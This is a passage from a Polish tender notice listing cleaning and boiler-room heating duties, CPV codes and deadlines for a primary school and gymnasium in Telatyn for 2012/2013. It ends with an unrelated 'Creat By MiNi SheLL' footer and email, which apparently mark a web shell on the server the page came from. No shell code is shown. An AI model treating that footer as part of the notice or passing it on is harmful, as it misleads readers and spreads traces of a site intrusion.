9. Z własnych środków wyposaża szkołę w środki czyszczące, piorące, dezynfekujące, ścierki, ręczniki, ręczniki jednorazowe do łazienek ( rolka kolorowe ), papier toaletowy (szary lub kolorowy ), mydło toaletowe w płynie z dozownikami.
10. W okresie  01.09.2012r.-15.10.2012r. i 15.04.2013r. -30.06.2013r.(z wyłączeniem sezonu grzewczego) oprócz przydzielonego rejonu zewnętrznego  dba o utrzymanie czystości na placu wybrukowanym płytami betonowymi w otoczeniu kotłowni .
11. Wykonuje niezbędne prace porządkowe w szkole i jej otoczeniu w okresie ferii zimowych i letnich (podlewanie kwiatów , koszenie trawy , strzyżenie żywopłotu, pielenie rabatek) w 2012r 
str.4
do 31.07.2013r oraz prace mające na celu przygotowanie obiektu do rozpoczęcia roku szkolnego w 2012/2013r oraz inne prace zlecone przez Dyrektora Szkoły Podstawowej a dotyczące 
utrzymania porządku w Szkole i obejściu ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.76.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Obsługa i eksploatacja kotłowni szkolnej c .o . oraz instalacji c. o . w Szkole Podstawowej im. Kardynała Stefana Wyszyńskiego i Gimnazjum w Telatynie (w sezonie grzewczym 2012/2013 tj.15.10.2012r.-15.04.2013r.).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obsługa i eksploatacja kotłowni szkolnej c .o . oraz instalacji c. o . w Szkole Podstawowej im. Kardynała Stefana Wyszyńskiego i Gimnazjum w Telatynie (w sezonie grzewczym 2012/2013 tj.15.10.2012r.-15.04.2013r.)
      Szczegółowy zakres prac i obowiązków :
1. Obsługa i eksploatacja kotłowni szkolnej c.o. oraz instalacji c.o.
1/ obsługa pieców c.o.- kontrolowanie parametrów procesu spalania  oraz urządzeń towarzyszących-pompy wodne, odstojniki i inne.
2/ transport węgla do pomieszczeń kotłowni, pryzmowanie. 
3/ bieżąca oraz okresowa konserwacja kotłów, pomp, instalacji c.o. oraz pomieszczeń                                kotłowni.
4/ utrzymanie we wszystkich pomieszczeniach szkolnych w dniach nauki stałej temperatury   18-200 C.
  5/ przestrzegać obwiązujących przepisów w zakresie obsługi, eksploatacji kotłowni c.o. oraz instalacji grzewczych, przepisów BHP oraz p. pożarowych, w tym: przestrzegania obowiązujących norm czasu pracy osób pracujących przy obsłudze kotłowni - dotyczy również pracodawcy.
  6/ przestrzegać norm zużycia opału ustalonych przez Dyrektora Szkoły - systematycznie  prowadzić kontrolkę zużytego opału.
 7/ zapoznać się z INSTRUKCJĄ EKSPLOATACJI KOTŁOWNI i bezwzględnie jej przestrzegać .
 8/ przestrzeganie instrukcji obsługi kotłów c.o., pomp wodnych i instalacji grzewczej.
 9/ systematycznie uprzątać żużel w miejsce wskazane przez Dyrektora Szkoły.
2. Utrzymanie w należytym stanie technicznym urządzeń kotłowni i instalacji c.o. W              przypadku awarii spowodowanej z winy  wykonawcy usuwa awarię na własny koszt.
 1/ W okresie zimowym odśnieża dojście do kotłowni oraz otoczenie kotłowni i drogę  dojazdową dla pojazdów dowożących węgiel .
2/  Dba o utrzymanie czystości w otoczeniu kotłowni 
3. Ogrzewać budynek szkolny należy codziennie. W dniu nauki szkolnej należy zabezpieczyć temperaturę w pomieszczeniach klasowych określanych w punkcie 1. 4.W pozostałe dni w miarę potrzeb zabezpieczając pomieszczenia szkolne przed zbytnim wychłodzeniem a urządzenia kotłowni i instalacji grzewczej przed zamrożeniem.
4. Osoby pracujące w kotłowni zobowiązane są posiadać aktualne uprawnienia obowiązujące palacza c.o. i wkładkę energetyczną - okazać do wglądu przed rozpoczęciem sezonu .
5. Wszelkie zalecenia pokontrolne wynikające z bieżącej pracy kotłowni wykonuje wykonawca we własnym zakresie i z własnych środków. 
 6. Wykonawca ponosi pełną odpowiedzialność przed jednostkami kontrolującymi.
7. Urządzenia i sprzęt niezbędny do transportu EKO -Groszku z placu do kotłowni zabezpiecza Wykonawca.
8. Wykonawca z własnych środków wyposaża kotłownię w środki czyszczące, piorące, dezynfekujące, ścierki, ręczniki oraz ubrania ochronne dla zatrudnionych pracowników.
9. Z własnych środków po zakończeniu sezonu grzewczego maluje pomieszczenia kotłowni oraz konserwuje i zabezpiecza urządzenia i kotły.
10. Wykonawca zobowiązany jest w uzgodnieniu z Dyrektorem Szkoły obsłużyć uroczystości i 
str.5
zajęcia szkolne w dniach wolnych od pracy .
11. Na polecenie Dyrektora Szkoły wykonuje inne prace związane z obsługą kotłowni, kotłów i 
instalacji c.o..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 93.90.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com